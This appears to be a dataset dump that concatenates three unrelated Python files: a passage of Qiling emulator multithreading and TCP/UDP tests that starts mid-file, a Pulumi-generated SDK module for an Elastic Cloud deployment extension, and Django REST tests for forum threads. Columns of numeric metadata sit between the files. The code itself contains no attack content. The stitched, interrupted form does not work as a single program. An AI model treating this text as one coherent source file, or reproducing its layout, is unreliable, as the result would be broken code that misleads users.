ql = Qiling(["../examples/rootfs/x86_linux/bin/x86_multithreading"], "../examples/rootfs/x86_linux", multithread=True, verbose=QL_VERBOSE.DEBUG)
ql.set_syscall("write", check_write, QL_INTERCEPT.ENTER)
ql.run()
self.assertTrue("thread 2 ret val is" in buf_out)
del ql
def test_multithread_elf_linux_arm64(self):
def check_write(ql, write_fd, write_buf, write_count, *args, **kw):
nonlocal buf_out
try:
buf = ql.mem.read(write_buf, write_count)
buf = buf.decode()
buf_out = buf
except:
pass
buf_out = None
ql = Qiling(["../examples/rootfs/arm64_linux/bin/arm64_multithreading"], "../examples/rootfs/arm64_linux", multithread=True, verbose=QL_VERBOSE.DEBUG)
ql.set_syscall("write", check_write, QL_INTERCEPT.ENTER)
ql.run()
self.assertTrue("thread 2 ret val is" in buf_out)
del ql
def test_multithread_elf_linux_x8664(self):
def check_write(ql, write_fd, write_buf, write_count, *args, **kw):
nonlocal buf_out
try:
buf = ql.mem.read(write_buf, write_count)
buf = buf.decode()
buf_out = buf
except:
pass
buf_out = None
ql = Qiling(["../examples/rootfs/x8664_linux/bin/x8664_multithreading"], "../examples/rootfs/x8664_linux", multithread=True, profile= "profiles/append_test.ql")
ql.set_syscall("write", check_write, QL_INTERCEPT.ENTER)
ql.run()
self.assertTrue("thread 2 ret val is" in buf_out)
del ql
def test_multithread_elf_linux_mips32el(self):
def check_write(ql, write_fd, write_buf, write_count, *args, **kw):
nonlocal buf_out
try:
buf = ql.mem.read(write_buf, write_count)
buf = buf.decode()
buf_out = buf
except:
pass
buf_out = None
ql = Qiling(["../examples/rootfs/mips32el_linux/bin/mips32el_multithreading"], "../examples/rootfs/mips32el_linux", multithread=True, verbose=QL_VERBOSE.DEBUG)
ql.set_syscall("write", check_write, QL_INTERCEPT.ENTER)
ql.run()
self.assertTrue("thread 2 ret val is" in buf_out)
del ql
def test_multithread_elf_linux_arm(self):
def check_write(ql, write_fd, write_buf, write_count, *args, **kw):
nonlocal buf_out
try:
buf = ql.mem.read(write_buf, write_count)
buf = buf.decode()
buf_out = buf
except:
pass
buf_out = None
ql = Qiling(["../examples/rootfs/arm_linux/bin/arm_multithreading"], "../examples/rootfs/arm_linux", multithread=True, verbose=QL_VERBOSE.DEBUG)
ql.set_syscall("write", check_write, QL_INTERCEPT.ENTER)
ql.run()
self.assertTrue("thread 2 ret val is" in buf_out)
del ql
def test_tcp_elf_linux_x86(self):
def check_write(ql, write_fd, write_buf, write_count, *args, **kw):
try:
buf = ql.mem.read(write_buf, write_count)
buf = buf.decode()
if buf.startswith("server send()"):
ql.buf_out = buf
except:
pass
ql = Qiling(["../examples/rootfs/x86_linux/bin/x86_tcp_test","20001"], "../examples/rootfs/x86_linux", multithread=True)
ql.set_syscall("write", check_write, QL_INTERCEPT.ENTER)
ql.run()
self.assertEqual("server send() 14 return 14.\n", ql.buf_out)
del ql
def test_tcp_elf_linux_x8664(self):
def check_write(ql, write_fd, write_buf, write_count, *args, **kw):
try:
buf = ql.mem.read(write_buf, write_count)
buf = buf.decode()
if buf.startswith("server send()"):
ql.buf_out = buf
except:
pass
ql = Qiling(["../examples/rootfs/x8664_linux/bin/x8664_tcp_test","20002"], "../examples/rootfs/x8664_linux", multithread=True)
ql.set_syscall("write", check_write, QL_INTERCEPT.ENTER)
ql.run()
self.assertEqual("server send() 14 return 14.\n", ql.buf_out)
del ql
def test_tcp_elf_linux_arm(self):
def check_write(ql, write_fd, write_buf, write_count, *args, **kw):
try:
buf = ql.mem.read(write_buf, write_count)
buf = buf.decode()
if buf.startswith("server write()"):
ql.buf_out = buf
except:
pass
ql = Qiling(["../examples/rootfs/arm_linux/bin/arm_tcp_test","20003"], "../examples/rootfs/arm_linux", multithread=True)
ql.set_syscall("write", check_write, QL_INTERCEPT.ENTER)
ql.run()
self.assertEqual("server write() 14 return 14.\n", ql.buf_out)
del ql
def test_tcp_elf_linux_arm64(self):
def check_write(ql, write_fd, write_buf, write_count, *args, **kw):
try:
buf = ql.mem.read(write_buf, write_count)
buf = buf.decode()
if buf.startswith("server send()"):
ql.buf_out = buf
except:
pass
ql = Qiling(["../examples/rootfs/arm64_linux/bin/arm64_tcp_test","20004"], "../examples/rootfs/arm64_linux", multithread=True)
ql.set_syscall("write", check_write, QL_INTERCEPT.ENTER)
ql.run()
self.assertEqual("server send() 14 return 14.\n", ql.buf_out)
del ql
def test_tcp_elf_linux_mips32el(self):
ql = Qiling(["../examples/rootfs/mips32el_linux/bin/mips32el_tcp_test","20005"], "../examples/rootfs/mips32el_linux", multithread=True)
ql.run()
del ql
def test_udp_elf_linux_x86(self):
def check_write(ql, write_fd, write_buf, write_count, *args, **kw):
try:
buf = ql.mem.read(write_buf, write_count)
buf = buf.decode()
if buf.startswith("server sendto()"):
ql.buf_out = buf
except:
pass
ql = Qiling(["../examples/rootfs/x86_linux/bin/x86_udp_test","20007"], "../examples/rootfs/x86_linux", multithread=True)
ql.set_syscall("write", check_write, QL_INTERCEPT.ENTER)
ql.run()
self.assertEqual("server sendto() 14 return 14.\n", ql.buf_out)
del ql
def test_udp_elf_linux_x8664(self):
def check_write(ql, write_fd, write_buf, write_count, *args, **kw):
try:
buf = ql.mem.read(write_buf, write_count)
buf = buf.decode()
if buf.startswith("server sendto()"):
ql.buf_out = buf
except:
pass
ql = Qiling(["../examples/rootfs/x8664_linux/bin/x8664_udp_test","20008"], "../examples/rootfs/x8664_linux", multithread=True)
ql.set_syscall("write", check_write, QL_INTERCEPT.ENTER)
ql.run()
self.assertEqual("server sendto() 14 return 14.\n", ql.buf_out)
del ql
def test_udp_elf_linux_arm64(self):
def check_write(ql, write_fd, write_buf, write_count, *args, **kw):
try:
buf = ql.mem.read(write_buf, write_count)
buf = buf.decode()
if buf.startswith("server sendto()"):
ql.buf_out = buf
except:
pass
ql = Qiling(["../examples/rootfs/arm64_linux/bin/arm64_udp_test","20009"], "../examples/rootfs/arm64_linux", multithread=True)
ql.set_syscall("write", check_write, QL_INTERCEPT.ENTER)
ql.run()
self.assertEqual("server sendto() 14 return 14.\n", ql.buf_out)
del ql
if __name__ == "__main__":
unittest.main()
| 34.65283
| 168
| 0.587172
| 1,160
| 9,183
| 4.412931
| 0.103448
| 0.039852
| 0.056261
| 0.084391
| 0.840789
| 0.834733
| 0.800938
| 0.786677
| 0.757765
| 0.757179
| 0
| 0.03071
| 0.294348
| 9,183
| 264
| 169
| 34.784091
| 0.759259
| 0.010345
| 0
| 0.762626
| 0
| 0
| 0.185091
| 0.126954
| 0
| 0
| 0
| 0
| 0.070707
| 1
| 0.131313
| false
| 0.060606
| 0.040404
| 0
| 0.176768
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
2d0f06b29f0af7357c7c3850fb4613e9d01108ad
| 26,565
|
py
|
Python
|
sdk/python/pulumi_ec/deployment_extension.py
|
pulumi/pulumi-ec
|
5036647eaa06d7298cae11a593dd22a6ce35a77c
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-11-09T15:35:56.000Z
|
2021-11-09T15:35:56.000Z
|
sdk/python/pulumi_ec/deployment_extension.py
|
pulumi/pulumi-ec
|
5036647eaa06d7298cae11a593dd22a6ce35a77c
|
[
"ECL-2.0",
"Apache-2.0"
] | 29
|
2021-11-03T12:51:54.000Z
|
2022-03-31T15:25:30.000Z
|
sdk/python/pulumi_ec/deployment_extension.py
|
pulumi/pulumi-ec
|
5036647eaa06d7298cae11a593dd22a6ce35a77c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['DeploymentExtensionArgs', 'DeploymentExtension']
@pulumi.input_type
class DeploymentExtensionArgs:
def __init__(__self__, *,
extension_type: pulumi.Input[str],
version: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
download_url: Optional[pulumi.Input[str]] = None,
file_hash: Optional[pulumi.Input[str]] = None,
file_path: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a DeploymentExtension resource.
:param pulumi.Input[str] extension_type: `bundle` or `plugin` allowed. A `bundle` will usually contain a dictionary or script, where a `plugin` is compiled from source.
:param pulumi.Input[str] version: Elastic stack version, a numeric version for plugins, e.g. 2.3.0 should be set. Major version e.g. 2.*, or wildcards e.g. * for bundles.
:param pulumi.Input[str] description: Description of the extension.
:param pulumi.Input[str] download_url: The URL to download the extension archive.
:param pulumi.Input[str] file_hash: Hash value of the file. If it is changed, the file is reuploaded.
:param pulumi.Input[str] file_path: File path of the extension uploaded.
:param pulumi.Input[str] name: Name of the extension.
"""
pulumi.set(__self__, "extension_type", extension_type)
pulumi.set(__self__, "version", version)
if description is not None:
pulumi.set(__self__, "description", description)
if download_url is not None:
pulumi.set(__self__, "download_url", download_url)
if file_hash is not None:
pulumi.set(__self__, "file_hash", file_hash)
if file_path is not None:
pulumi.set(__self__, "file_path", file_path)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="extensionType")
def extension_type(self) -> pulumi.Input[str]:
"""
`bundle` or `plugin` allowed. A `bundle` will usually contain a dictionary or script, where a `plugin` is compiled from source.
"""
return pulumi.get(self, "extension_type")
@extension_type.setter
def extension_type(self, value: pulumi.Input[str]):
pulumi.set(self, "extension_type", value)
@property
@pulumi.getter
def version(self) -> pulumi.Input[str]:
"""
Elastic stack version, a numeric version for plugins, e.g. 2.3.0 should be set. Major version e.g. 2.*, or wildcards e.g. * for bundles.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: pulumi.Input[str]):
pulumi.set(self, "version", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description of the extension.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="downloadUrl")
def download_url(self) -> Optional[pulumi.Input[str]]:
"""
The URL to download the extension archive.
"""
return pulumi.get(self, "download_url")
@download_url.setter
def download_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "download_url", value)
@property
@pulumi.getter(name="fileHash")
def file_hash(self) -> Optional[pulumi.Input[str]]:
"""
Hash value of the file. If it is changed, the file is reuploaded.
"""
return pulumi.get(self, "file_hash")
@file_hash.setter
def file_hash(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "file_hash", value)
@property
@pulumi.getter(name="filePath")
def file_path(self) -> Optional[pulumi.Input[str]]:
"""
File path of the extension uploaded.
"""
return pulumi.get(self, "file_path")
@file_path.setter
def file_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "file_path", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the extension.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _DeploymentExtensionState:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
download_url: Optional[pulumi.Input[str]] = None,
extension_type: Optional[pulumi.Input[str]] = None,
file_hash: Optional[pulumi.Input[str]] = None,
file_path: Optional[pulumi.Input[str]] = None,
last_modified: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
url: Optional[pulumi.Input[str]] = None,
version: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering DeploymentExtension resources.
:param pulumi.Input[str] description: Description of the extension.
:param pulumi.Input[str] download_url: The URL to download the extension archive.
:param pulumi.Input[str] extension_type: `bundle` or `plugin` allowed. A `bundle` will usually contain a dictionary or script, where a `plugin` is compiled from source.
:param pulumi.Input[str] file_hash: Hash value of the file. If it is changed, the file is reuploaded.
:param pulumi.Input[str] file_path: File path of the extension uploaded.
:param pulumi.Input[str] last_modified: The datetime the extension was last modified.
:param pulumi.Input[str] name: Name of the extension.
:param pulumi.Input[int] size: The extension file size in bytes.
:param pulumi.Input[str] url: The extension URL to be used in the plan.
:param pulumi.Input[str] version: Elastic stack version, a numeric version for plugins, e.g. 2.3.0 should be set. Major version e.g. 2.*, or wildcards e.g. * for bundles.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if download_url is not None:
pulumi.set(__self__, "download_url", download_url)
if extension_type is not None:
pulumi.set(__self__, "extension_type", extension_type)
if file_hash is not None:
pulumi.set(__self__, "file_hash", file_hash)
if file_path is not None:
pulumi.set(__self__, "file_path", file_path)
if last_modified is not None:
pulumi.set(__self__, "last_modified", last_modified)
if name is not None:
pulumi.set(__self__, "name", name)
if size is not None:
pulumi.set(__self__, "size", size)
if url is not None:
pulumi.set(__self__, "url", url)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description of the extension.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="downloadUrl")
def download_url(self) -> Optional[pulumi.Input[str]]:
"""
The URL to download the extension archive.
"""
return pulumi.get(self, "download_url")
@download_url.setter
def download_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "download_url", value)
@property
@pulumi.getter(name="extensionType")
def extension_type(self) -> Optional[pulumi.Input[str]]:
"""
`bundle` or `plugin` allowed. A `bundle` will usually contain a dictionary or script, where a `plugin` is compiled from source.
"""
return pulumi.get(self, "extension_type")
@extension_type.setter
def extension_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "extension_type", value)
@property
@pulumi.getter(name="fileHash")
def file_hash(self) -> Optional[pulumi.Input[str]]:
"""
Hash value of the file. If it is changed, the file is reuploaded.
"""
return pulumi.get(self, "file_hash")
@file_hash.setter
def file_hash(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "file_hash", value)
@property
@pulumi.getter(name="filePath")
def file_path(self) -> Optional[pulumi.Input[str]]:
"""
File path of the extension uploaded.
"""
return pulumi.get(self, "file_path")
@file_path.setter
def file_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "file_path", value)
@property
@pulumi.getter(name="lastModified")
def last_modified(self) -> Optional[pulumi.Input[str]]:
"""
The datetime the extension was last modified.
"""
return pulumi.get(self, "last_modified")
@last_modified.setter
def last_modified(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_modified", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the extension.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[int]]:
"""
The extension file size in bytes.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def url(self) -> Optional[pulumi.Input[str]]:
"""
The extension URL to be used in the plan.
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
Elastic stack version, a numeric version for plugins, e.g. 2.3.0 should be set. Major version e.g. 2.*, or wildcards e.g. * for bundles.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
class DeploymentExtension(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
download_url: Optional[pulumi.Input[str]] = None,
extension_type: Optional[pulumi.Input[str]] = None,
file_hash: Optional[pulumi.Input[str]] = None,
file_path: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
version: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides an Elastic Cloud extension resource, which allows extensions to be created, updated, and deleted.
Extensions allow users of Elastic Cloud to use custom plugins, scripts, or dictionaries to enhance the core functionality of Elasticsearch. Before you install an extension, be sure to check out the supported and official [Elasticsearch plugins](https://www.elastic.co/guide/en/elasticsearch/plugins/current/index.html) already available.
## Example Usage
### With extension file
```python
import pulumi
import base64
import hashlib
import pulumi_ec as ec
def computeFilebase64sha256(path):
fileData = open(path).read().encode()
hashedData = hashlib.sha256(fileData.encode()).digest()
return base64.b64encode(hashedData).decode()
file_path = "/path/to/plugin.zip"
example_extension = ec.DeploymentExtension("exampleExtension",
description="my extension",
version="*",
extension_type="bundle",
file_path=file_path,
file_hash=computeFilebase64sha256(file_path))
```
### With download URL
```python
import pulumi
import pulumi_ec as ec
example_extension = ec.DeploymentExtension("exampleExtension",
description="my extension",
download_url="https://example.net",
extension_type="bundle",
version="*")
```
### Using extension in Deployment
```python
import pulumi
import pulumi_ec as ec
example_extension = ec.DeploymentExtension("exampleExtension",
description="my extension",
version="*",
extension_type="bundle",
download_url="https://example.net")
latest = ec.get_stack(version_regex="latest",
region="us-east-1")
with_extension = ec.Deployment("withExtension",
region="us-east-1",
version=latest.version,
deployment_template_id="aws-io-optimized-v2",
elasticsearch=ec.DeploymentElasticsearchArgs(
extensions=[ec.DeploymentElasticsearchExtensionArgs(
name=example_extension.name,
type="bundle",
version=latest.version,
url=example_extension.url,
)],
))
```
## Import
You can import extensions using the `id`, for example
```sh
$ pulumi import ec:index/deploymentExtension:DeploymentExtension name 320b7b540dfc967a7a649c18e2fce4ed
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: Description of the extension.
:param pulumi.Input[str] download_url: The URL to download the extension archive.
:param pulumi.Input[str] extension_type: `bundle` or `plugin` allowed. A `bundle` will usually contain a dictionary or script, where a `plugin` is compiled from source.
:param pulumi.Input[str] file_hash: Hash value of the file. If it is changed, the file is reuploaded.
:param pulumi.Input[str] file_path: File path of the extension uploaded.
:param pulumi.Input[str] name: Name of the extension.
:param pulumi.Input[str] version: Elastic stack version, a numeric version for plugins, e.g. 2.3.0 should be set. Major version e.g. 2.*, or wildcards e.g. * for bundles.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DeploymentExtensionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides an Elastic Cloud extension resource, which allows extensions to be created, updated, and deleted.
Extensions allow users of Elastic Cloud to use custom plugins, scripts, or dictionaries to enhance the core functionality of Elasticsearch. Before you install an extension, be sure to check out the supported and official [Elasticsearch plugins](https://www.elastic.co/guide/en/elasticsearch/plugins/current/index.html) already available.
## Example Usage
### With extension file
```python
import pulumi
import base64
import hashlib
import pulumi_ec as ec
def computeFilebase64sha256(path):
fileData = open(path).read().encode()
hashedData = hashlib.sha256(fileData.encode()).digest()
return base64.b64encode(hashedData).decode()
file_path = "/path/to/plugin.zip"
example_extension = ec.DeploymentExtension("exampleExtension",
description="my extension",
version="*",
extension_type="bundle",
file_path=file_path,
file_hash=computeFilebase64sha256(file_path))
```
### With download URL
```python
import pulumi
import pulumi_ec as ec
example_extension = ec.DeploymentExtension("exampleExtension",
description="my extension",
download_url="https://example.net",
extension_type="bundle",
version="*")
```
### Using extension in Deployment
```python
import pulumi
import pulumi_ec as ec
example_extension = ec.DeploymentExtension("exampleExtension",
description="my extension",
version="*",
extension_type="bundle",
download_url="https://example.net")
latest = ec.get_stack(version_regex="latest",
region="us-east-1")
with_extension = ec.Deployment("withExtension",
region="us-east-1",
version=latest.version,
deployment_template_id="aws-io-optimized-v2",
elasticsearch=ec.DeploymentElasticsearchArgs(
extensions=[ec.DeploymentElasticsearchExtensionArgs(
name=example_extension.name,
type="bundle",
version=latest.version,
url=example_extension.url,
)],
))
```
## Import
You can import extensions using the `id`, for example
```sh
$ pulumi import ec:index/deploymentExtension:DeploymentExtension name 320b7b540dfc967a7a649c18e2fce4ed
```
:param str resource_name: The name of the resource.
:param DeploymentExtensionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DeploymentExtensionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
download_url: Optional[pulumi.Input[str]] = None,
extension_type: Optional[pulumi.Input[str]] = None,
file_hash: Optional[pulumi.Input[str]] = None,
file_path: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
version: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DeploymentExtensionArgs.__new__(DeploymentExtensionArgs)
__props__.__dict__["description"] = description
__props__.__dict__["download_url"] = download_url
if extension_type is None and not opts.urn:
raise TypeError("Missing required property 'extension_type'")
__props__.__dict__["extension_type"] = extension_type
__props__.__dict__["file_hash"] = file_hash
__props__.__dict__["file_path"] = file_path
__props__.__dict__["name"] = name
if version is None and not opts.urn:
raise TypeError("Missing required property 'version'")
__props__.__dict__["version"] = version
__props__.__dict__["last_modified"] = None
__props__.__dict__["size"] = None
__props__.__dict__["url"] = None
super(DeploymentExtension, __self__).__init__(
'ec:index/deploymentExtension:DeploymentExtension',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
download_url: Optional[pulumi.Input[str]] = None,
extension_type: Optional[pulumi.Input[str]] = None,
file_hash: Optional[pulumi.Input[str]] = None,
file_path: Optional[pulumi.Input[str]] = None,
last_modified: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
url: Optional[pulumi.Input[str]] = None,
version: Optional[pulumi.Input[str]] = None) -> 'DeploymentExtension':
"""
Get an existing DeploymentExtension resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: Description of the extension.
:param pulumi.Input[str] download_url: The URL to download the extension archive.
:param pulumi.Input[str] extension_type: `bundle` or `plugin` allowed. A `bundle` will usually contain a dictionary or script, where a `plugin` is compiled from source.
:param pulumi.Input[str] file_hash: Hash value of the file. If it is changed, the file is reuploaded.
:param pulumi.Input[str] file_path: File path of the extension uploaded.
:param pulumi.Input[str] last_modified: The datetime the extension was last modified.
:param pulumi.Input[str] name: Name of the extension.
:param pulumi.Input[int] size: The extension file size in bytes.
:param pulumi.Input[str] url: The extension URL to be used in the plan.
:param pulumi.Input[str] version: Elastic stack version, a numeric version for plugins, e.g. 2.3.0 should be set. Major version e.g. 2.*, or wildcards e.g. * for bundles.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DeploymentExtensionState.__new__(_DeploymentExtensionState)
__props__.__dict__["description"] = description
__props__.__dict__["download_url"] = download_url
__props__.__dict__["extension_type"] = extension_type
__props__.__dict__["file_hash"] = file_hash
__props__.__dict__["file_path"] = file_path
__props__.__dict__["last_modified"] = last_modified
__props__.__dict__["name"] = name
__props__.__dict__["size"] = size
__props__.__dict__["url"] = url
__props__.__dict__["version"] = version
return DeploymentExtension(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Description of the extension.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="downloadUrl")
def download_url(self) -> pulumi.Output[Optional[str]]:
"""
The URL to download the extension archive.
"""
return pulumi.get(self, "download_url")
@property
@pulumi.getter(name="extensionType")
def extension_type(self) -> pulumi.Output[str]:
"""
`bundle` or `plugin` allowed. A `bundle` will usually contain a dictionary or script, where a `plugin` is compiled from source.
"""
return pulumi.get(self, "extension_type")
@property
@pulumi.getter(name="fileHash")
def file_hash(self) -> pulumi.Output[Optional[str]]:
"""
Hash value of the file. If it is changed, the file is reuploaded.
"""
return pulumi.get(self, "file_hash")
@property
@pulumi.getter(name="filePath")
def file_path(self) -> pulumi.Output[Optional[str]]:
"""
File path of the extension uploaded.
"""
return pulumi.get(self, "file_path")
@property
@pulumi.getter(name="lastModified")
def last_modified(self) -> pulumi.Output[str]:
"""
The datetime the extension was last modified.
"""
return pulumi.get(self, "last_modified")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the extension.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def size(self) -> pulumi.Output[int]:
"""
The extension file size in bytes.
"""
return pulumi.get(self, "size")
@property
@pulumi.getter
def url(self) -> pulumi.Output[str]:
"""
The extension URL to be used in the plan.
"""
return pulumi.get(self, "url")
@property
@pulumi.getter
def version(self) -> pulumi.Output[str]:
"""
Elastic stack version, a numeric version for plugins, e.g. 2.3.0 should be set. Major version e.g. 2.*, or wildcards e.g. * for bundles.
"""
return pulumi.get(self, "version")
| 40.619266
| 345
| 0.624355
| 3,053
| 26,565
| 5.248935
| 0.079921
| 0.077566
| 0.091732
| 0.089236
| 0.866022
| 0.84156
| 0.824337
| 0.805554
| 0.797317
| 0.775039
| 0
| 0.00561
| 0.268549
| 26,565
| 653
| 346
| 40.68147
| 0.819103
| 0.391229
| 0
| 0.70607
| 1
| 0
| 0.084661
| 0.005005
| 0
| 0
| 0
| 0
| 0
| 1
| 0.162939
| false
| 0.003195
| 0.015974
| 0
| 0.277955
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2d0f3baba428e8d2c644479e78ed39f14e0efea6
| 5,061
|
py
|
Python
|
tests/forums/test_views_threads.py
|
phiratio/django-forums-app
|
a8d50b436bc34f74ab8c58234f5f7cf5175e00c5
|
[
"MIT"
] | 22
|
2019-10-14T20:57:18.000Z
|
2022-01-13T11:32:16.000Z
|
tests/forums/test_views_threads.py
|
phiratio/django-forums-app
|
a8d50b436bc34f74ab8c58234f5f7cf5175e00c5
|
[
"MIT"
] | 22
|
2019-10-16T12:21:59.000Z
|
2021-12-16T14:05:46.000Z
|
tests/forums/test_views_threads.py
|
phiratio/django-forums-app
|
a8d50b436bc34f74ab8c58234f5f7cf5175e00c5
|
[
"MIT"
] | 10
|
2019-10-15T19:55:30.000Z
|
2022-02-27T13:53:55.000Z
|
import json
import pytest
from rest_framework.test import APIClient
from forums.models import Thread
@pytest.mark.django_db
def test_add_thread(add_user, get_user_client, add_forum):
forum = add_forum(title="General Forum", description="This is a general forum")
user = add_user('user', 'user@email.com', 'testpass123')
client = get_user_client(user)
resp = client.post(
"/api/threads/",
json.dumps(
{"title": "A thread in the General Forum", "text": "This is a new thread", "forum": forum.id,
"user": user.id}),
content_type="application/json",
)
assert resp.status_code == 201
assert resp.data["title"] == "A thread in the General Forum"
threads = Thread.objects.all()
assert len(threads) == 1
@pytest.mark.django_db
def test_add_thread_not_logged_in(add_forum, add_user):
forum = add_forum(title="General Forum", description="This is a general forum")
user = add_user('user', 'user@email.com', 'testpass123')
client = APIClient()
resp = client.post(
"/api/threads/",
json.dumps({"title": "A thread in the General Forum", "text": "This is a new thread", "forum": forum.id,
"user": user.id}),
content_type="application/json",
)
assert resp.status_code == 403
threads = Thread.objects.all()
assert len(threads) == 0
@pytest.mark.django_db
def test_remove_thread(add_forum, add_user, add_thread, get_user_client):
forum = add_forum(title="General Forum", description="This is a general forum")
user = add_user('user', 'user@email.com', 'testpass123')
thread = add_thread(title='A thread in the General Forum', text='This is a new thread', forum=forum,
user=user)
client = get_user_client(user)
resp = client.get(f"/api/threads/{thread.id}/")
assert resp.status_code == 200
assert resp.data["title"] == "A thread in the General Forum"
resp_two = client.delete(f"/api/threads/{thread.id}/")
assert resp_two.status_code == 204
forums = Thread.objects.all()
assert len(forums) == 0
@pytest.mark.django_db
def test_remove_thread_incorrect_id(add_user, get_user_client):
user = add_user('user', 'user@email.com', 'testpass123')
client = get_user_client(user)
resp = client.delete(f"/api/threads/99/")
assert resp.status_code == 404
@pytest.mark.django_db
def test_update_thread(add_forum, add_user, add_thread, get_user_client):
forum = add_forum(title="General Forum", description="This is a general forum")
user = add_user('user', 'user@email.com', 'testpass123')
thread = add_thread(title='A thread in the General Forum', text='This is a new thread', forum=forum,
user=user)
client = get_user_client(user)
resp = client.put(
f"/api/threads/{thread.id}/",
json.dumps({"title": "This is an updated title", "text": "This is an updated text", "forum": forum.id,
"user": user.id}),
content_type="application/json"
)
assert resp.status_code == 200
assert resp.data["title"] == "This is an updated title"
assert resp.data["text"] == "This is an updated text"
resp_two = client.get(f"/api/threads/{thread.id}/")
assert resp_two.status_code == 200
